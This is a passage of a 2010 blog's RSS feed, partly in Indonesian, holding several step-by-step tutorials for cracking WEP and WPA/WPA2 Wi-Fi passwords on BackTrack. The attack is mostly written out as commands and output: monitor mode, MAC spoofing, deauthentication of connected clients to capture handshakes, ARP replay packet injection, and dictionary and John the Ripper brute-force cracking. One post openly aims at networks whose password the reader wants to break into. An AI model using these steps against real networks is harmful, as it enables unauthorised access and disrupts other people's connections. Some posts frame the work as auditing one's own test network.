&lt;div style="text-align: justify;"&gt;Pertama, siapkan CD Live Backtrack atau  bisa make linux ubuntu dengan menginstall aplikasi aircrack-ng. Ketik  perintah di bawah untuk menginstall aircrack-ng di linux ubuntu&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;&lt;strong&gt;&lt;em&gt;sudo apt-get  install aircrack-ng&lt;/em&gt;&lt;/strong&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;Kedua,&amp;nbsp; masuk ke dekstop dengan perintah  ~# startx (untuk yang make backtrack)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Ketiga,&amp;nbsp; buka konsole (terminal) dan  ketikkan perintah untuk melihat interface device yang ada&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;&lt;strong&gt;&lt;em&gt;sudo su&lt;/em&gt;&lt;/strong&gt;&lt;/blockquote&gt;&lt;blockquote style="text-align: justify;"&gt;&lt;strong&gt;&lt;em&gt;ifconfig -a&lt;/em&gt;&lt;/strong&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;Keempt, ketikkan perintah di bawah untuk  mengaktifkan interface wlan0&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;&lt;strong&gt;&lt;em&gt;ifconfig wlan0  up&lt;/em&gt;&lt;/strong&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;Kelima, sekarang gunakan aplikasi  airmon-ng untuk airmon-ng membuat virtual interface mode monitor dengan  mengetikkan perintah di bawah.&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;&lt;strong&gt;&lt;em&gt;airmon-ng start  wlan0&lt;/em&gt;&lt;/strong&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;Keenam, monitorlah jaringan di sekitar  kamu. Caranya ketiklah perintah ini.&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;&lt;em&gt;&lt;strong&gt;airodump-ng mon0&lt;/strong&gt;&lt;/em&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;cat : mon0 adalah interface virtual  hasil dari airmon-ng tadi&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Ketujuh, fokuskan monitoring jaringan  hotspot yang ingin kita bobol passwordnya. Ketik lagi perintah berikut.&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;&lt;strong&gt;&lt;em&gt;airodump-ng -w  coba –channel 11 –bssid 001122334455 mon0&lt;/em&gt;&lt;/strong&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;ket: memonitoring khusus jaringan yang  memiliki bssid 00:11:22:33:44:55 pada channel 11 dan hasil dari  monitoring di tulis pada file yang bernama ‘coba’&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Selanjutnya, gunakan serangan dengan  cara disconnect salah satu client&amp;nbsp; untuk mendapatkan paket handshake  yang dibutuhkan untuk proses cracking&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;&lt;strong&gt;&lt;em&gt;aireplay-ng -0 1  -a 001122334455 -c oo1cbfa13fe3 mon0 &lt;/em&gt;&lt;/strong&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;ket: aireplay-ng digunakan untuk  mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk  mendapatkan paket handshake yang dibutuhkan untuk proses cracking&lt;br /&gt;
-0 : mode serangan deAuthentication&lt;br /&gt;
1 : dilakukan sebanyak 1x deAuth&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Terakhir, setelah mendapatkan paket  handshake, selanjutnya adalah proses cracking dengan menggunakan  aircrack dan file password dengan existensi .lst atau .txt dengan  perintah&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;&lt;strong&gt;&lt;em&gt;aircrack-ng  coba*.cap -w /pentest/passwords/wordlists/listpass.txt&lt;/em&gt;&lt;/strong&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;ket : listpass.txt adalah file password  yang saya buat sendiri dan terletak pada  /pentest/passwords/wordlists/listpass.txt&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Oiya, keberhasilan proses cracking  tergantung ada tidaknya password yang ada di list password dengan  password yang sebenarnya. Jika password yang digunakan pada jaringan  tersebut ada di list password maka proses cracking akan berhasil dan  jika password list yang kita miliki tidak mencatat password yang  digunakan pada jaringan tersebut kemungkinan keberhasilan proses  cracking akan gagal. Dan akhirnya, yang sedikit dari aku ini semoga  membantu buat pengetahuan yang belum tau aja. Selamat mencoba&lt;/div&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Tutorial WPA crack with Backtrack 3</title><link>http://kluwanbacktrack.blogspot.com/2010/04/tutorial-wpa-crack-with-backtrack-3.html</link><category>all for free tool your downloads</category><category>backtrack</category><category>bt3</category><category>daftar isi</category><category>Hacking Tools</category><category>password</category><category>tips dan trick</category><category>tutorial gratis</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Fri, 9 Apr 2010 06:34:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-9049200431322970697</guid><description>This Video demonstrates WPA cracking using dictionary based brute  force, all tools used in demonstration are available in Backtrack3.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Backtrack is a security penetration testing live open source Linux  distro, Backtrack took two of the best, Whax and Auditor and merged them  to make one meaningful distro that emerged as an ethical hackers best  choice for security auditing. It comes loaded with tools including  network mapping, Info gathering, vulnerability Identification tools, and  even some for Bluetooth hacking.&lt;br /&gt;
Commands Used in video (Step by Step):&lt;br /&gt;
1)airmon-ng stop wlan0&lt;br /&gt;
2)ifconfig wlan0 down&lt;br /&gt;
3)macchanger –mac 00:11:22:33:44:55 wlan0&lt;br /&gt;
4)airmon-ng start wlan0&lt;br /&gt;
5)airodump-ng wlan0&lt;br /&gt;
6)airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0&lt;br /&gt;
7)aireplay-ng -0 5 -a (bssid)wlan0&lt;br /&gt;
8)aircrack-ng (filename-01.cap)-w (dictionary location)&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;span class="vvqbox vvqyoutube" style="height: 344px; width: 425px;"&gt;&lt;object data="http://www.youtube.com/v/Ej52mNHs49A&amp;amp;rel=0&amp;amp;fs=1&amp;amp;showsearch=0&amp;amp;showinfo=0" height="344" id="vvq-111-youtube-1" style="visibility: visible;" type="application/x-shockwave-flash" width="425"&gt;&lt;param value="opaque" name="wmode"&gt;&lt;param value="true" name="allowfullscreen"&gt;&lt;param value="always" name="allowscriptacess"&gt;&lt;/object&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt; &lt;/div&gt;&lt;div class="MsoNormal"&gt;Backtrack can be downloaded from &lt;a href="http://www.remote-exploit.org/backtrack.html" target="_blank" title="BackTrack"&gt;here&lt;/a&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How To Crack A Wi-Fi Network’s WEP Password</title><link>http://kluwanbacktrack.blogspot.com/2010/03/how-to-crack-wi-fi-networks-wep.html</link><category>password</category><category>software</category><category>WEP</category><category>wireless</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Fri, 19 Mar 2010 03:46:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-6237560499605924802</guid><description>First run the following to get a list of your network interfaces: airmon-ng&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
The only one I’ve got there is labelled ra0. Yours may be different;  take note of the label and write it down. From here on in, substitute it  in everywhere a command includes (interface).&lt;br /&gt;
Now, run the following four commands. See the output that I got for  them in the screenshot below.&lt;br /&gt;
&lt;blockquote class="code"&gt;airmon-ng stop (interface)&lt;br /&gt;
ifconfig (interface) down&lt;br /&gt;
macchanger –mac 00:11:22:33:44:55 (interface)&lt;br /&gt;
airmon-ng start (interface) &lt;/blockquote&gt;&lt;img alt="" class="left" src="http://cache.gawker.com/assets/images/lifehacker/2009/07/wepcrack01.png" /&gt; If you don’t get the same results from these  commands as pictured here, most likely your network adaptor won’t work  with this particular crack. If you do, you’ve successfully “faked” a new  MAC address on your network interface, 00:11:22:33:44:55.&lt;br /&gt;
Now it’s time to pick your network. Run:&lt;br /&gt;
&lt;blockquote&gt;airodump-ng (interface)&lt;/blockquote&gt;To see a list of wireless networks around you. When you see the one  you want, hit Ctrl+C to stop the list. Highlight the row pertaining to  the network of interest, and take note of two things: its BSSID and its  channel (in the column labelled CH), as pictured below. Obviously the  network you want to crack should have WEP encryption (in the ENC)  column, not WPA or anything else.&lt;br /&gt;
&lt;img alt="" class="left" src="http://cache.gawker.com/assets/images/lifehacker/2009/07/wepcrack02.png" /&gt; Like I said, hit Ctrl+C to stop this listing. (I  had to do this once or twice to find the network I was looking for.)  Once you’ve got it, highlight the BSSID and copy it to your clipboard  for reuse in the upcoming commands.&lt;br /&gt;
Now we’re going to watch what’s going on with that network you chose  and capture that information to a file. Run:&lt;br /&gt;
&lt;blockquote class="code"&gt;airodump-ng -c (channel) -w (file name)  –bssid (bssid) (interface)&lt;/blockquote&gt;Where (channel) is your network's channel, and (bssid) is the BSSID  you just copied to clipboard. You can use the Shift+Insert key  combination to paste it into the command. Enter anything descriptive for  (file name). I chose "yoyo", which is the name of the network name I'm  cracking.&lt;br /&gt;
&lt;img alt="" class="left" src="http://cache.gawker.com/assets/images/lifehacker/2009/07/wepcrack03.png" /&gt;&lt;br /&gt;
You'll get output like what's in the window in the background  pictured below. Leave that one be. Open a new Konsole window in the  foreground, and enter this command:&lt;br /&gt;
&lt;blockquote class="code"&gt;aireplay-ng -1 0 -a (bssid) -h  00:11:22:33:44:55 -e (essid) (interface)&lt;/blockquote&gt;Here the ESSID is the access point’s SSID name, which in my case is  yoyo. What you want to get after this command is the reassuring  “Association successful” message with that smiley face.&lt;br /&gt;
&lt;img alt="" class="left" src="http://cache.gawker.com/assets/images/lifehacker/2009/07/wepcrack04.png" /&gt;&lt;br /&gt;
You’re almost there. Now it’s time for:&lt;br /&gt;
&lt;blockquote class="code"&gt;aireplay-ng -3 -b (bssid) -h  00:11:22:33:44:55 (interface)&lt;/blockquote&gt;Here we’re creating router traffic to capture more throughput faster  to speed up our crack. After a few minutes, that front window will start  going crazy with read/write packets. (Also, I was unable to surf the  web with the yoyo network on a separate computer while this was going  on.) Here’s the part where you might have to grab yourself a cup of  coffee or take a walk. Basically you want to wait until enough data has  been collected to run your crack. Watch the number in the “#Data”  column—you want it to go above 10,000. (Pictured below it’s only at  854.)&lt;br /&gt;
Depending on the power of your network (mine is inexplicably low at  -32 in that screenshot, even though the yoyo AP was in the same room as  my adaptor), this process could take some time. Wait until that #Data  goes over 10k, though—because the crack won’t work if it doesn’t. In  fact, you may need more than 10k, though that seems to be a working  threshold for many.&lt;br /&gt;
&lt;img alt="" class="left" src="http://cache.gawker.com/assets/images/lifehacker/2009/07/wepcrack05.png" /&gt;&lt;br /&gt;
Once you’ve collected enough data, it’s the moment of truth. Launch a  third Konsole window and run the following to crack that data you’ve  collected:&lt;br /&gt;
&lt;blockquote&gt;aircrack-ng -b (bssid) (file name-01.cap)&lt;/blockquote&gt;Here the filename should be whatever you entered above for (file  name). You can browse to your Home directory to see it; it’s the one  with .cap as the extension.&lt;br /&gt;
If you didn’t get enough data, aircrack will fail and tell you to try  again with more. If it succeeds, it will look like this:&lt;br /&gt;
&lt;img alt="" class="left" src="http://cache.gawker.com/assets/images/lifehacker/2009/07/wepcrack-success.png" /&gt; The WEP key appears next to “KEY FOUND.” Drop the  colons and enter it to log onto the network.&lt;br /&gt;
&lt;h3&gt;Problems Along the Way&lt;/h3&gt;With this article I set out to prove that cracking WEP is a  relatively “easy” process for someone determined and willing to get the  hardware and software going. I still think that’s true, but unlike the  guy in the video below, I had several difficulties along the way. In  fact, you’ll notice that the last screenshot up there doesn’t look like  the others—it’s because it’s not mine. Even though the AP which I was  cracking was my own and in the same room as my Alfa, the power reading  on the signal was always around -30, and so the data collection was very  slow, and BackTrack would consistently crash before it was complete.  After about half a dozen attempts (and trying BackTrack on both my Mac  and PC, as a live CD and a virtual machine), I still haven’t captured  enough data for aircrack to decrypt the key.http://www.lifehacker.com.au/2009/07/how-to-crack-a-wi-fi-networks-wep-password-with-backtrack/</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Back Track 4 on USB with persistent changes – bootable BT4 USB stick</title><link>http://kluwanbacktrack.blogspot.com/2010/02/back-track-4-on-usb-with-persistent.html</link><category>bt4 beta</category><category>BT4 final</category><category>final free</category><category>google earth plus</category><category>hacking</category><category>Hacking Tools</category><category>movie free download</category><category>operating system</category><category>tutorial</category><category>tutorial gratis</category><category>video</category><category>WEP</category><category>whitehat</category><category>wireless</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Fri, 19 Feb 2010 03:55:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-5695638482717239684</guid><description>If you want to have Back Track 4 on USB with persistent changes and want to make it bootable USB with linux just follow the instructions in the article How To:&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt; “Make bootable USB to save changes – Back Track 3 on USB with persistent changes“. The instructions are the same for BT4. (By the way, this post is written for my personal use with a help I found somewhere online, I post it here to show my hardware compatability).&lt;br /&gt;
&lt;br /&gt;
To make BT4 bootable with persistent changes I used 2 USB sticks. The first to launch Back Track (BT2,3 or4) without any changes and the second to prepare and make all changes in linux for my Back Track 4. I used 2 USB sticks because it is easier.&lt;br /&gt;
&lt;br /&gt;
Well, when you finish Step 5 you will need to follow the instructions below:&lt;br /&gt;
&lt;br /&gt;
Let’s say we have a formatted second partition, mount it and create a changes directory in the root of the file system. Open shell and execute these commands:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mount /dev/sdc2 /mnt/sdc2&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cd /mnt/sdc2&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mkdir changes&lt;br /&gt;
&lt;br /&gt;
Don’t forget that it can be sdc2 but not sdb2. It depends on your computer and configurations. If you use 2 USB sticks there should be sdc2. next we will make some changes to how the system boots. Now execute these commands:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cd /boot/syslinux&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; chmod +Xx lilo&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; chmod +Xx syslinux&lt;br /&gt;
&lt;br /&gt;
Then you need to open syslinux.cfg and modify it. To do that execute the commands:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cd /mnt/sdc1/boot/syslinux&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; kwrite syslinux.cfg&lt;br /&gt;
&lt;br /&gt;
I copied the boot definition I wanted to change and created a new entry so I would have a fall back option if something became broken. well, in the file find:&lt;br /&gt;
&lt;br /&gt;
1. “LABEL BT4″&lt;br /&gt;
&lt;br /&gt;
2. Copy this line and next 3 lines and paste all these lines below existing 4 lines. Well, now we have the same 4 lines. Our new section.&lt;br /&gt;
&lt;br /&gt;
3. Change the “LABEL BT4″ to something you want like “LABEL BT4-persistent” and description to something like “MENU LABEL BT4 Beta – Console – Persistent”.&lt;br /&gt;
&lt;br /&gt;
4. Now we need to change the line that begins with APPEND in your copied section by adding “changes=/dev/sdx2″ immediately after “root=/dev/ram0 rw” where the x is the drive appropriate for your system. In my case it looks like this, “….root=/dev/ram0 rw changes=/dev/sdc2….”. Remember that you need to add “changes=/dev/sdx2″ after “rw” and remove the last word that goes after “rw”. I think there should be “quite” or something similar at the end of the line. Just delete this word.&lt;br /&gt;
&lt;br /&gt;
5. Save your changes and exit the editor.&lt;br /&gt;
&lt;br /&gt;
That should work fine now. Reboot and select the option you setup configured. To test it, create a file and reboot again. If your file is still there, everything is perfect. If you follow all instruction step by step you won’t have any errors.</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Tips and Trick Using Backtrack with Virtual Box</title><link>http://kluwanbacktrack.blogspot.com/2010/02/tips-and-trick-using-backtrack-with.html</link><category>backtrack</category><category>bt4 beta</category><category>BT4 final</category><category>daftar isi</category><category>hacking</category><category>Hacking Tools</category><category>wireless</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Tue, 16 Feb 2010 04:17:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-2856386085681053084</guid><description>Hi Guest, verry simple to use backtrack verry good with virtual box. &lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;Step one download Backtrack, step two download Virtual Box. All is free and how to using your search in the youtube.&lt;br /&gt;
Good luck !</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper</title><link>http://kluwanbacktrack.blogspot.com/2010/02/cracking-wpa2-psk-with-backtrack-4.html</link><category>backtrack</category><category>BT4 final</category><category>cracking</category><category>daftar isi</category><category>hacking</category><category>Hacking Tools</category><category>WEP</category><category>wireless</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Sat, 13 Feb 2010 04:53:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-6480568311951998673</guid><description>Basic steps :&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Put interface in monitor mode &lt;/li&gt;
&lt;li&gt;Find wireless network (protected with WPA2 and a Pre Shared Key) &lt;/li&gt;
&lt;li&gt;Capture all packets &lt;/li&gt;
&lt;li&gt;Wait until you see a client and deauthenticate the client, so the  handshake can be captured &lt;/li&gt;
&lt;li&gt;Crack the key using a dictionary file (or via John The Ripper) &lt;/li&gt;
&lt;/ul&gt;I’ll use a Dlink DWL-G122 (USB) wireless network interface for this  procedure.&amp;nbsp; In backtrack4, this device is recognized as wlan0.&lt;br /&gt;
First, put the card in monitor mode :&lt;br /&gt;
&lt;div&gt; &lt;pre style="background-color: #f4f4f4; border-style: none; color: black; font-family: consolas,'Courier New',courier,monospace; font-size: 8pt; line-height: 12pt; margin: 0em; overflow: visible; padding: 0px; width: 100%;"&gt;root@bt:~# airmon-ng 

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]

root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)&lt;/pre&gt;&lt;/div&gt;Ok, we can now use interface mon0&lt;br /&gt;
Let’s find a wireless network that uses WPA2 / PSK :&lt;br /&gt;
&lt;div&gt; &lt;pre style="background-color: #f4f4f4; border-style: none; color: black; font-family: consolas,'Courier New',courier,monospace; font-size: 8pt; line-height: 12pt; margin: 0em; overflow: visible; padding: 0px; width: 100%;"&gt;root@bt:~# airodump-ng mon0

 CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                    

 00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet                                                  

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                            

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet&lt;/pre&gt;&lt;/div&gt;Stop airodump-ng and run it again, writing all packets to disk :&lt;br /&gt;
&lt;div&gt; &lt;pre style="background-color: #f4f4f4; border-style: none; color: black; font-family: consolas,'Courier New',courier,monospace; font-size: 8pt; line-height: 12pt; margin: 0em; overflow: visible; padding: 0px; width: 100%;"&gt;airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2&lt;/pre&gt;&lt;/div&gt;At this point, you have 2 options : either wait until a client  connects and the 4-way handshake is complete, or deauthenticate an  existing client and thus force it to reassociate.&amp;nbsp; Time is money, so  let’s force the deauthenticate. We need the bssid of the AP (-a) and the  mac of a connected client (-c)&lt;br /&gt;
&lt;div&gt; &lt;pre style="background-color: #f4f4f4; border-style: none; color: black; font-family: consolas,'Courier New',courier,monospace; font-size: 8pt; line-height: 12pt; margin: 0em; overflow: visible; padding: 0px; width: 100%;"&gt;root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19  Waiting &lt;span style="color: blue;"&gt;for&lt;/span&gt; beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]&lt;/pre&gt;&lt;/div&gt;As a result, airodump-ng should indicate “WPA Handshake:” in the  upper right corner&lt;br /&gt;
&lt;div&gt; &lt;pre style="background-color: #f4f4f4; border-style: none; color: black; font-family: consolas,'Courier New',courier,monospace; font-size: 8pt; line-height: 12pt; margin: 0em; overflow: visible; padding: 0px; width: 100%;"&gt;CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                

 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet                                              

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230 &lt;/pre&gt;&lt;/div&gt;Stop airodump-ng and make sure the files were created properly&lt;br /&gt;
&lt;div&gt; &lt;pre style="background-color: #f4f4f4; border-style: none; color: black; font-family: consolas,'Courier New',courier,monospace; font-size: 8pt; line-height: 12pt; margin: 0em; overflow: visible; padding: 0px; width: 100%;"&gt;root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv&lt;/pre&gt;&lt;/div&gt;Form this point forward, you do not need to be anywhere near the  wireless network. All cracking will happen offline, so you can stop  airodump and other processes and even walk away from the AP. In fact, I  would suggest to walk away and find yourself a cosy place where you can  live, eat, sleep, etc…. Cracking a WPA2 PSK key is based on  bruteforcing, and it can take a very very long time.&amp;nbsp; There are 2 ways  of bruteforcing : one that is relatively fast but does not guarantee  success and one that is very slow, but guarantees that you will find the  key at some point in time&lt;br /&gt;
The first option is by using a worklist/drstionary file.&amp;nbsp; A lot of  these files can be found on the internet (e.g. &lt;a href="http://www.theargon.com/"&gt;www.theargon.com&lt;/a&gt; or on packetstorm  (see the archives)), or can be generated with tools such as John The  Ripper. Once the wordlist is created, all you need to do is run  aircrack-ng with the worklist and feed it the .cap fie that contains the  WPA2 Handshake. &lt;br /&gt;
So if your wordlist is called word.lst (under /tmp/wordlists), you  can run&lt;br /&gt;
&lt;div&gt; &lt;pre style="background-color: #f4f4f4; border-style: none; color: black; font-family: consolas,'Courier New',courier,monospace; font-size: 8pt; line-height: 12pt; margin: 0em; overflow: visible; padding: 0px; width: 100%;"&gt;aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;The success of cracking the WPA2 PSK key is directly linked to the  strength of your password file. In other words, you may get lucky and  get the key very fast, or you may not get the key at all.&lt;/div&gt;&lt;div&gt;The second method (bruteforcing) will be successfull for sure, but  it may take ages to complete. Keep in mind, a WPA2 key can be up to 64  characters, so in theory you would to build every password combination  with all possible character sets and feed them into aircrack. If you  want to use John The Ripper to create all possible password combinations  and feed them into aircrack-ng, this is the command to use :&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt; &lt;pre style="background-color: #f4f4f4; border-style: none; color: black; font-family: consolas,'Courier New',courier,monospace; font-size: 8pt; line-height: 12pt; margin: 0em; overflow: visible; padding: 0px; width: 100%;"&gt;root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap&lt;/pre&gt;&lt;/div&gt;(Note : the PSK in my testlab is only 8 characters, contains one  uppercase character and 4 numbers). I will post the output when the key  was cracked, including the time it required to crack the key.&lt;br /&gt;
That’s it&lt;br /&gt;
Update :after 20 hours of cracking, the key still has not been  found.&amp;nbsp; The system I’m using to crack the keys is not very fast, but  let’s look at some facts :&lt;br /&gt;
8 characters, plain characters (lowercase and uppercase) or digits =  each character in the key could has 26+26+10 (62) possible combinations.  So the maximum number of combinations that need to be checked in the  bruteforce process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 =&amp;nbsp; 218 340  105 584 896&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; At about 600 keys per second on my “slow” system, it  could take more than 101083382 hours to find the key&amp;nbsp; (11539 year).&amp;nbsp; I  have stopped the cracking process as my machine is way too slow to crack  the key while I’m still alive…&amp;nbsp; So think about this when doing a WPA2  PSK Audit.</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Here's how to get the WEP key (WEP-based wireless password)</title><link>http://kluwanbacktrack.blogspot.com/2010/02/heres-how-to-get-wep-key-wep-based.html</link><category>backtrack</category><category>daftar isi</category><category>free programming</category><category>Hacking Tools</category><category>tutorial gratis</category><category>WEP</category><category>wireless</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Fri, 12 Feb 2010 08:33:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-3899678900156377315</guid><description>Here's how to get the WEP key (WEP-based wireless password)&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Without bsa stale well, to the point ... First prepare the equipment used to ...&lt;br /&gt;
1) laptop, let me take him lightly.&lt;br /&gt;
2) wireless adapter okay with chipset supports the ability to walk dl monitor mode and perform packet injection. Dl it can use a wireless adapter, dg dr atheros chipset.&lt;br /&gt;
3) To perform this attack, I recommend using Linux OS. more precisely backtrack min v 3.0 (ato v 2.0 + dr jasakom). can be downloaded at http://remote-exploit.org&lt;br /&gt;
Cracking the WEP Key dg backtrack (klu bs, mudeng little comand2 in backtrack ttg ^ _ ^)&lt;br /&gt;
&amp;gt; run konsole 1&lt;br /&gt;
&lt;br /&gt;
1) Make sure you use a wireless adapter is recommended reply. to see command airmon dg bs-ng and to see the detail use the command iwconfig&lt;br /&gt;
2) Now it's time to order a wireless scanner&lt;br /&gt;
airodump-ng ath0. This command requested that airodump-ng to see all the data packets via adapter ath0. Then you will get the wireless information in hack-be.&lt;br /&gt;
3) Stelah set goals for mlakukan wireless network cracking, skarang time to collect as much data the network dr to be on-crack dg statistical methods. The command&lt;br /&gt;
airodump-ng - channel 1 - BSSID 00:18:39:39:23:66-w results ath0&lt;br /&gt;
- channel 1 (dg adjust the target channel sample channel 1)&lt;br /&gt;
- BSSID (BSSID sesuaikn dg jg yg seen as a target a second way).&lt;br /&gt;
&lt;br /&gt;
&amp;gt; run konsole 2&lt;br /&gt;
4) Helping create the data packet&lt;br /&gt;
command,,,&lt;br /&gt;
aireplay-ng - arpreplay-b 00:18:39:39:23:66-h 00:18: DE: C3: D8: 68 ath0&lt;br /&gt;
&lt;br /&gt;
-b 00:18:39:39:23:66 (condition BSSID / MAC address of AP)&lt;br /&gt;
-h 00:18: DE: C3: D8: 68 (MAC address of the client kompie dr yg dg connected sdang AP)&lt;br /&gt;
&lt;br /&gt;
&amp;gt; run konsole 3&lt;br /&gt;
5) Direct PTW method. crack the WEP key based on the collected data packets. with command&lt;br /&gt;
aircrack-PTW-01.cap results&lt;br /&gt;
&lt;br /&gt;
- Order the results-01 comes from the name file is used for storing sets of data packets. ( step 3)&lt;br /&gt;
-. Seal the file type "result" requisite dl this WEP key cracking.&lt;br /&gt;
&lt;br /&gt;
6) Wait patiently until the process stops dah 3 console shows "KEY FOUND! [...................]"&lt;br /&gt;
7) Use it wisely, okey&lt;br /&gt;
Best successful yes,,,,good luck.</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Wi-Fi Hacking – Crack WEP</title><link>http://kluwanbacktrack.blogspot.com/2010/02/wi-fi-hacking-crack-wep.html</link><category>backtrack</category><category>bt4 beta</category><category>BT4 final</category><category>daftar isi</category><category>final free</category><category>hacking</category><category>Hacking Tools</category><category>WEP</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Sun, 7 Feb 2010 19:38:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-6185103490562509547</guid><description>&lt;div class="entry"&gt;&lt;div class="snap_preview"&gt;To crack WEP at this time, Me using BackTrack OS. Let’s go, open some consoles:&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;airmon-ng ==&amp;gt; adapter list&lt;br /&gt;
